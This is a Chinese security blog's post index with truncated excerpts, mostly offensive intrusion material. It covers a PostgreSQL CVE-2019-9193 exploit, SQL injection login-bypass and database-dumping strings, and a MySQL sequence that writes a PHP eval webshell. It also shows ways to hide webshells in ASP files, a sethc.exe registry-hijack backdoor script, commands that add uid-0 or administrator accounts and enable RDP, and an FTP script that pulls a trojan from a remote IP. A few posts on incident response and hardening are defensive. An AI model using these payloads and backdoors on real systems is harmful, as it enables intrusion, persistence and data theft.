- 博客(43)
- 资源 (47)
- 收藏
- 关注
原创 PostgreSQL高权限命令执行(CVE-2019-9193)漏洞复现&实战
一、漏洞利用这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令,利用的前提1、需要登录2、需要高权限所以要先弱口令爆破之后,然后查看是否是高权限。这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。先删除你
2022-04-26 19:27:34 2818
原创 Linux 应急响应流程及实战演练
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。0x01 入侵排查思路一、账号安全基本使用:1、用...
2019-02-03 08:54:28 8955 1
原创 CTF-i春秋网鼎杯第四场部分writeup题目分析
双色块下载题目发现只有一个文件且为gif文件,可以正常打开,且只存在绿色和紫色两个颜色,分布不均匀。先丢到winhexv看一下有没有插入其他文件,确实找到了png头文件。到binwalk分析一下,分离出图片上面写着key,可能下面用得到,继续分析这张图片无异常接着分离一下gif,分离出576张图片,是24² 这两个变量应该是代表0,1了按...
2018-08-31 17:34:08 16873 2
原创 PHP程序的常见漏洞攻击分析
随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。如何通过全局变量进行攻击?PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处...
2018-07-26 15:23:10 8122 1
原创 最全的服务器提权
最全的WEBSHELLc: d: e:..... -------------------------------------------------------------------C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settin...
2018-07-04 15:54:05 4861 1
原创 总结搜索型手工注入的全过程(不同权限下的方法)
首先,简单的判断搜索型注入漏洞存在不存在的办法是先搜索,如果出错,说明90%存在这个漏洞。a%' and 1=1-- 正常a%' and 1=2-- 错误有注入由于网站过滤了 ' 等等的。所以工具不行,要手工了。累人啊~~~判断权限a%' and (select is_member('dbo'))=1-- 返回正常则 saa%' and (select is_member('db_owner...
2018-07-04 15:53:22 2256 1
原创 注入技巧收集
SA点数据库分离技术相关SA点数据库分离搞法+语句:注射点不显错,执行下面三条语句页面都返回正常。and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtas...
2018-06-13 12:09:19 1919
原创 知识合集
所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。分享给大家、、 希望对大家有所帮助!asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='1...
2018-06-13 12:09:00 1615
原创 网站入侵思路
开始找工作了,先总结一点渗透的手段,面试的时候可能用的着,我始终坚信机会是留给有准备的人的,多一份努力,就多一份机遇。稍微写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。注意经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。欢迎来俺博客玩http://www.cnseay.com(一)针对网站程序,不考虑服务器。一、查找注入,注意数据库...
2018-06-04 16:05:54 4549 5
原创 万能密码
1、asp & aspx "or "a"="a )or(a=a or 1=1-- a or 1=1-- "or 1=1-- or a=a "or"="a=a or= or=or 1 or 1=1=1 1 or 1=1 or 1=1 OR 1=1%00 "or 1=1%00 xor 用户名 UNION Select 1,1,1 FROM admin Where = (替换表名ad...
2018-06-04 16:05:33 2043
原创 拖库经验
拖库经验技巧集合@mssql:【1】射点导出' and 1=2 union select 1,char(94)+CaSt(Loginname as varchar)+char(94)+CaSt(password as varchar)+char(94)+CaSt(trueName as varchar)+char(94)+CaSt(email as varchar)+char(94)+CaSt(p...
2018-05-18 15:22:32 6015 1
转载 国内找不到的APP,都在这里!
昨天果酱告诉了大家安卓机卡顿的原因,其中提到,安卓手机下载应用最好在谷歌商店下载。那今天果酱又要推荐一个非常不错的安卓应用商店,一个集应用宝与 Google Play 于一身的纯良应用商店——APKPure 。APKPure 页面清爽简洁,没有推送和广告,支持中文,支持国内全部主流应用,支持所有 Google Play 的纯净应用,听起来是不是就觉得超级酷。首先果酱给你们看看APP页面:我们都知道...
2018-05-15 17:45:05 13995 1
原创 提升asp.dll权限提权方法
1)查看有特权的dll文件: 命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 2)将asp.dll加入系统权限的列表cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\...
2018-05-14 14:20:57 1737
原创 手工注入常用SQL语句
判断数据库类型: Access: and (select id from MSysAccessObjects) >0 返回正常说明是accessMSSQL: and (select id from sysobjects) >0 返回正...
2018-05-11 09:24:32 3773
原创 上传Tips
1、上传目录不可执行的时候修改上传文件的名字为./../可写可执行目录/文件名2、判断是远程还是本地过滤的条件查看执行过滤的时间3、绕过本地验证禁用js,本地构造表单4、在上传是遇到无法上传文件时,尝试看一下源码!然后突破5、常见截断符 00 \n '\0'6、上传页面无提交或上传按钮用javascript:lbtnUpload.click();...
2018-05-11 09:24:10 1524
原创 启动项详解
启动项详解启动项目就是开机的时候系统会在前台或者后台运行的程序。当Windows(操作系统)完成登录过程,进程表中出现了很多的进程!Windows在启动的时候,自动加载了很多程序许多程序的自启动,给我们带来了很多方便,这是不争的事实,但不是每个自启动的程序对我们都有用;更甚者,也许有病毒或木马在自启动行列!其实Windows2000/XP中的自启动文件,除了从以前系统中遗留下来的Autoexec....
2018-05-09 11:14:03 6544
原创 镜像劫持sethc
方法:Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.Creat...
2018-05-09 10:01:17 2453
原创 服务器安全方案 (被入侵后)
服务器安全方案 (被入侵后)一 :分析黑客入侵与放后门过程1.通过网站漏洞进入后提权然后克隆管理员账号2.上传ASP或PHP木马并隐蔽深的目录3,通过入侵C段机器ARP目标主机得到敏感信息4, 社会工程学入侵 (MINCK有本著作《欺骗的艺术》)四.留后门比如远程控制软件,radmin远控软件等系统级后门黑客之门hxdef100(黑客守卫者) 粘贴键后门 administrators万能密码后门 ...
2018-05-09 10:00:45 2239
原创 常用隐藏SHELL方法
第一种:在我们要做手脚的asp文件里加入如下内容<%if request(”action”)=”ok” then%>shell代码插在这里<%end if%>访问的时候在你作手脚的asp文件后面加上?action=ok,即可第二种:在我们要做手脚的asp文件里加入如下内容<%on error resume nextstrFileName = Request.Query...
2018-05-09 10:00:06 2647
原创 常用命令
net share d:\web=e:\web /grant:zk0898,change 控制面版:运行>>>>>>>>>>>:control计算机管理:command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pa...
2018-05-07 11:43:23 1641
原创 补丁号对应利用工具
KB952004 :MS09-012 PRKB956572 :MS09-012 巴西烤肉KB2393802:MS11-011KB2592799:MS11-080KB2621440:MS12-0203 KB2160329:MS10-048KB970483 :MS09-020 iis6提权(可能是)KB2124261,KB2271195 MS10-065 IIS7提权(可能是) KB977165 :...
2018-05-07 11:42:42 3829 1
原创 win2003server安全配置
win2003server安全配置//卸载不安全组件regsvr32 /u C:\WINDOWS\System32\wshom.ocx regsvr32 /u C:\WINDOWS\System32\\shell32.dll//磁盘权限...cacls c:\ /c /g administrators:f system:fcacls d:\ /c...
2018-05-07 11:42:03 268
原创 sqlmap实战
1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 p...
2018-05-06 09:24:56 504
原创 PHP爆绝对路径方法收集
PHP爆绝对路径方法收集1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg:www.xxx.com/news.php?id=149' 2、错误参数值爆路径 说明:将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg:www.xxx.com/researcharchive.php?id=-1 3、Google爆...
2018-05-06 09:24:33 3291
原创 perl提升权限
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell放到PERL目录下的BIN目中#!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);$_ = $ENV{QUERY_STRING};s/%20/ /ig;s/%2f/\//ig;...
2018-05-06 09:24:11 1024
原创 mysql写一句话
1、创建一个表create TABLE a (cmd text NOT NULL);2、插入数据insert INTO a (cmd) VALUES('<?php eval($_POST[hihack]);?>');3、导出一句话select cmd from a into outfile 'C:\AppServ\www\x.php';4、删除表Drop TABLE IF EXISTS...
2018-05-06 09:23:52 1344
原创 linux添加账户命令
方法一:useradd -u 0 -o -g root -G root -d /home/keio keio为用户指定空口令时,执行下列形式的命令: # passwd -d keio删除用户# userdel -r keio方法二:如果希望添加一个拥有root权限的账号admin,可参考以下步骤进行,当然,以下的步骤必须有root权限才能运行:Step1 添加一个一般的用户admin。...
2018-05-06 09:22:59 9463
原创 linux日志路径收集
附:收集的一些日志路径 ../../../../../../../../../../var/log/httpd/access_log ../../../../../../../../../../var/log/httpd/error_log ../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ...
2018-05-06 09:22:37 973
原创 lcx使用帮助说明
软件介绍:lcx.exe(端口转发工具)[Usage of Packet Transmit:] lcx -<listen|tran|slave> <option> [-log logfile][option:] -listen <ConnectPort> <TransmitPort> -tran <ConnectPort> &l...
2018-05-06 09:22:17 505
原创 ipc$入侵
而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。 我们只需要在isql窗口中输入:use mastersp_dropextendedproc ...
2018-05-06 09:21:56 1087
原创 FTP登入错误详解
1、 无法连接到远程服务器。Socket 错误 = #10060。 原因:对方未开FTP或者无法连通 端口错误(默认21)2、530 Sorry, no ANONYMOUS access allowed 原因:帐号密码错误或者拒绝登入 3、Too many users - please try again later. 原因:限制了登入的人数4、530 Not logged in, only ...
2018-05-06 09:21:34 5386
原创 ftp传马命令
ftp传马命令与教程假设我们已经有一个FTP服务器,上面有一个我们配置好的木马文件mhgz.exe,我们应该知道FTP服务器的三个参数:1、FTP服务器的IP地址:如1.1.1.12、FTP服务器的用户名:如test3、FTP服务器的密 码:如test123在远程计算机的C***下依次输入下面的命令:1、echo open 221.202.50.125>>test.txt 登陆FTP服...
2018-05-06 09:21:13 1955
原创 cookie注入
语句: javascript:alert(document.cookie="id="+escape("137 and 1=1"));
2018-05-04 13:03:43 304
原创 cmd
加账户net user seayace seay /add 建立账户,用户名seayace 密码seaynet localgroup Administrators seayace /add 提升到管理员权限开启3389REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t...
2018-05-04 13:03:17 249
原创 CGI资料整理
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着 cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权 perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 以POST的方法发送表格的话,就不能蒙混过关(%00将...
2018-05-04 13:02:56 299
原创 Cgi-bin 30个漏洞+使用方法
==============================/smspass.plusername=username&password=password/index.cgiwei=ren&gen=command/passmaster.cgiAction=Add&Username=Username&Password=Password/accountcreate.cgi...
2018-05-04 13:01:39 11782
原创 ASP FSO
1.FSO生成一句话代码<%Dim Content,Fso,FoutSet Fso=Server.CreateObject("Scripting.FileSystemObject")Set Fout=Fso.CreateTextFile(Server.Mappath("../123.asp")) Fout.WriteLine"<script language=VBScript runa...
2018-05-04 13:00:56 226
原创 adsutil.vbs 的使用
IIS 管理脚本之 adsutil.vbs 的使用 Adsutil.vbs是什么?它是Windows 2003的IIS服务自带的基于命令行下的IIS管理脚本,位于%SystemDrive%\Inetpub\AdminScripts目录下,95,426字节。这么大的脚本一看就知道功能肯定非常强大,事实也确是如此。我感觉它就是个命令行下的“Internet 信息服务管理器”(事实上Windows 2...
2018-05-04 13:00:33 870
Sublime Text 3.x 破解补丁[build 3176可用]
2018-05-18
C#正则表达式的使用
2018-05-06
必知必会正则表达式
2018-05-06
最新702种CGI漏洞
2018-05-04
从零开始制作一个Web蜜罐扫描器
2022-04-26
网络安全人员角色分类和能力要求框架
2022-04-20
某市云计算中心安全体系规划
2022-04-14
架构部岗位职级晋升框架&标准
2022-04-13
三级等保评审需要的网络安全管理制度大全汇编
2022-04-13
GDPR_Audit_Program_Enterprise_EN英文版
2021-12-26
GDPR_Audit_Program_Enterprise_CN中文版
2021-12-26
ISO27001信息安全管理体系标准(中文版).pdf
2021-11-19
oracle中修改用户密码复杂度
2018-07-26
最新Python3.5零基础+高级+完整项目(28周全)培训视频学习资料
2018-06-13
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人